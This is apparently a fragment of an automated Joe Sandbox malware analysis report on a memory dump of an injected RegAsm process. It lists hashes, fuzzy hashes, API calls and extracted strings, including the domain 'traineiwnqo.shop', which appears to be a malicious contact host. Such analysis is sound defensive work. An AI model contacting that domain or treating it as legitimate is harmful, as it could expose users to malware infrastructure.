            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8f82cd91b960163e0e5808135f27fbf829c94ba9cad26be72ed03aca08fe522e
            • Instruction ID: 88c506306284b6f53fae94f60c5ac28e1cc24ce12ec5c0cbe14b4f17907f8af3
            • Opcode Fuzzy Hash: 8f82cd91b960163e0e5808135f27fbf829c94ba9cad26be72ed03aca08fe522e
            • Instruction Fuzzy Hash: D1F05CB560811057DB228D589CC1FBBFB9CCB97314F090426E945D7202E1B55884C3EE
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
            • Instruction ID: 795788ef56b96c1a87959a2f12f052f92192ccaa2abbeab3ace1170b05378ed5
            • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
            • Instruction Fuzzy Hash: 4AD05B61608361466B648D199410577F7E0EEC7711F45555FF582D3245D634DC41C1AD
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4ecffa9da22ecf8f0cb7484af7bb187de05e3d893e8e2e4297bd0606ccac6e2b
            • Instruction ID: 19f27002de139311d532cdf0a5dadcc30a617ca7306e28bf39ffa9b0c1a24fda
            • Opcode Fuzzy Hash: 4ecffa9da22ecf8f0cb7484af7bb187de05e3d893e8e2e4297bd0606ccac6e2b
            • Instruction Fuzzy Hash: 45D092608082859BD3059F54C959E27BBB8EF87318F45A99CE4882B661D234E948C7AA
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocString
            • String ID: -$.$/$0$1$3$7$E$F$I$M$N$Q$X$Z$\$]$_$g$i$t
            • API String ID: 2525500382-3840792241
            • Opcode ID: 34b2002c33908cdc904edf0693c871045e4e1a09d1ed9e193f0e3319d6412fd4
            • Instruction ID: 96cb5398d84af92d0af91690a551596a32e8875e404a3310b4c7eb945ff85e54
            • Opcode Fuzzy Hash: 34b2002c33908cdc904edf0693c871045e4e1a09d1ed9e193f0e3319d6412fd4
            • Instruction Fuzzy Hash: A7A1727050CBC28AD3368A3C98487DABFD15BA7324F084B9DE5E94A2E2D3B44546C767
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Variant$ClearInit
            • String ID: !$#$%$'$)$+$-$/$9$=$?$n$q
            • API String ID: 2610073882-1071266462
            • Opcode ID: a0bbf188bdef0a021ef6c17e298bd608ef58975ad04b6650471343fbb64cca1d
            • Instruction ID: 2809399181118501a9d804626b5b8a9a88b760e87ec92ab85ba5d1495bfd0bba
            • Opcode Fuzzy Hash: a0bbf188bdef0a021ef6c17e298bd608ef58975ad04b6650471343fbb64cca1d
            • Instruction Fuzzy Hash: C441F37010C3C19ED362DB28D09875EBFE0ABA6318F881A9DF4D44B392C7798549CB93
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Variant$ClearInit
            • String ID: !$#$%$'$)$+$-$/$9$=$?$n$q
            • API String ID: 2610073882-1071266462
            • Opcode ID: b050d201fb3290e6e6b82bd017bf639e88d3ab13b1b3fa132c52f229ea72cb07
            • Instruction ID: 3460601eeb3e64c44eac0f1af0712e4cb2a5fd897327b2d52351aa9d80f2f269
            • Opcode Fuzzy Hash: b050d201fb3290e6e6b82bd017bf639e88d3ab13b1b3fa132c52f229ea72cb07
            • Instruction Fuzzy Hash: D441C27010C3C19ED361DB28908875EBFE0ABA6314F845E9DF4E44B392C7798549CB63
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: %$'$1$1$3$5$7$9$?$@$D$H
            • API String ID: 1927566239-2802390439
            • Opcode ID: 522683a62472983370d838072ed5bcca0a8f4d7babe56d03a5ab104262c1bbc1
            • Instruction ID: 45a4f18320d1b374e85e82b86ab003bac34e5c63c7b4f03164d8d86de9c35e8d
            • Opcode Fuzzy Hash: 522683a62472983370d838072ed5bcca0a8f4d7babe56d03a5ab104262c1bbc1
            • Instruction Fuzzy Hash: B74118701087818ED726CF28D498706BFE0AB16314F088A9DD8EA4F797C774D605CBA6
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: %$'$1$1$3$5$7$9$?$@$D$H
            • API String ID: 1927566239-2802390439
            • Opcode ID: b401b783ec908f1c5b13f858e93dc00dfab92e8e84abc02dea9cca9571f97b2a
            • Instruction ID: 836341f980cf8c7e8d8bb1d143024b3cf0fae830d99e5b6c14b5719918d84301
            • Opcode Fuzzy Hash: b401b783ec908f1c5b13f858e93dc00dfab92e8e84abc02dea9cca9571f97b2a
            • Instruction Fuzzy Hash: B141E9601087C18ED726CF2CD488716BFE06B16214F488A9ED8E54F7D7C375DA1ACB66
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: !$i$k$m$o$q$s$u$v$w
            • API String ID: 1927566239-2573421488
            • Opcode ID: 7bfb1cb778c037d1e7ea6437ed2e33705a16be6bfd0bbb20899df837543afbbc
            • Instruction ID: e32bc32200d3b0052710997c4ff78e635987ec48b79412ec1e14b6228f1f78ad
            • Opcode Fuzzy Hash: 7bfb1cb778c037d1e7ea6437ed2e33705a16be6bfd0bbb20899df837543afbbc
            • Instruction Fuzzy Hash: 9431B27050C3C18AD321DB28D05879FBFE0AB95348F048C5EE4CA97392D7BA9548DB63
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: BZ$JB$SY$VU$[M$yI$ys
            • API String ID: 0-2800861462
            • Opcode ID: c9f966281d422041fb9d01f3208fd165648449c003dda886f376f597bafa99d2
            • Instruction ID: 3aaf0c5e9ddac422a64c62ed6f7a23188ae074809220aa233d952046406d6e5b
            • Opcode Fuzzy Hash: c9f966281d422041fb9d01f3208fd165648449c003dda886f376f597bafa99d2
            • Instruction Fuzzy Hash: A5F11DB41083819BD314DF59D990A2BBBF0EF96788F144A1DF0D98B361D3389945CB9B
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Variant$ClearInit
            • String ID: T$V$W$X
            • API String ID: 2610073882-3009632173
            • Opcode ID: 2f494ea275f35900c4a1c140c65cd30844daf452493bcb390bd471df32c0bab5
            • Instruction ID: 84965b94688c73dd34a0a381efb57dc1b8c7603a6d9b763ee15bafcd77ae8945
            • Opcode Fuzzy Hash: 2f494ea275f35900c4a1c140c65cd30844daf452493bcb390bd471df32c0bab5
            • Instruction Fuzzy Hash: D451906010C7C18ED3319B3C995879BBFE1ABA7224F184B9DE4E94B2E2C7309545CB67
            APIs
            • GetSystemDirectoryW.KERNEL32(37C539E7,00000104), ref: 0040D27A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: DirectorySystem
            • String ID: <?$traineiwnqo.shop
            • API String ID: 2188284642-920402337
            • Opcode ID: 376000f2929f4b1e897b819b7ab8830530c2ca87bc9560ba9dd1e5f503588ffc
            • Instruction ID: cb79f9d119bbcc5c349f596b6c01ce667fb9f8ab358c849ab24bbad4e6a1ae48
            • Opcode Fuzzy Hash: 376000f2929f4b1e897b819b7ab8830530c2ca87bc9560ba9dd1e5f503588ffc
            • Instruction Fuzzy Hash: B8C167B150D3C18BD3708F25948479BBBE6FF86344F144A6DE8C86B291CB389945CB97
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: String
            • String ID: R$U
            • API String ID: 2568140703-2056283921
            • Opcode ID: 4d9f655a98abdddcf411aef1a5eb1dc83f14243dad9d5230978017d9c63cd6c4
            • Instruction ID: facaef09d57fc36e8301dcc93150ffe9bfd6ed82364c7e9ff28dd0fcde9fab3a
            • Opcode Fuzzy Hash: 4d9f655a98abdddcf411aef1a5eb1dc83f14243dad9d5230978017d9c63cd6c4
            • Instruction Fuzzy Hash: F341497120D3808FC7349B68D4903AEFBE1AFD6320F554A2EE5E997381CA388845CB17